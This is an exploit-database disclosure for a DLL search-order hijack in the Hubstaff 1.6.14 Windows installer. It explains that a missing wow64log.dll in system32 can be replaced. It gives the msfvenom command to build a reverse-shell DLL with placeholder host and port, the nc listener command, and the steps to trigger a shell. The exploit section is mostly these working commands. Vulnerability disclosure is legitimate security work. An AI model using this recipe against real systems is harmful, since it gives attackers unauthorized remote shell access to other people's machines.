Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking

EDB-ID:

51461

CVE:

N/A


Author:

Ahsan Azad

Type:

local


Platform:

Windows

Date:

2023-05-23


*#Exploit Title:*  Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking
*#Date:* 14/05/2023
*#Exploit Author:* Ahsan Azad
*#Vendor Homepage:* https://hubstaff.com/
*#Software Link:* https://app.hubstaff.com/download
*#Version:* 1.6.13, 1.6.14
*#Tested On:* 64-bit operating system, x64-based processor

*Description*
Hubstaff is an employee work tracker with screenshots, timesheets, billing,
in-depth reports, and more.

During testing. It was found that the system32 subdirectory was missing a
DLL library with the name *wow64log.dll* that had been required by the
hubstaff's setup file during installation. Hence, using Metasploit's
msfvenom to create a new wow64log.dll file, Tester was able to get a
reverse shell locally.


*Exploit*
1- Generate a dll file with the name  wow64log.dll using the command:

*msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll
-o  wow64log.dll*

2- Place the newly generated DLL to the *system32 *directory.
3- Start a listener on attacker's console using:

*nc -lnvp <port_used_while_generating_DLL>*

4- Launch the exe.

Reverse shell will be receive as:


*C:\Windows>*



*Attachments (For the understanding of verification team)*
1.png - Showing the wow64.dll was not found by the exe. [image: 1.png]

2.png - Showing how tester was able to generate a new dll using msfvenom on
port 1337.
[image: 2.png]

3.png - Showing a reverse connection received on the attacker's console
at C:\Windows> by launching the exe.[image: 3.png]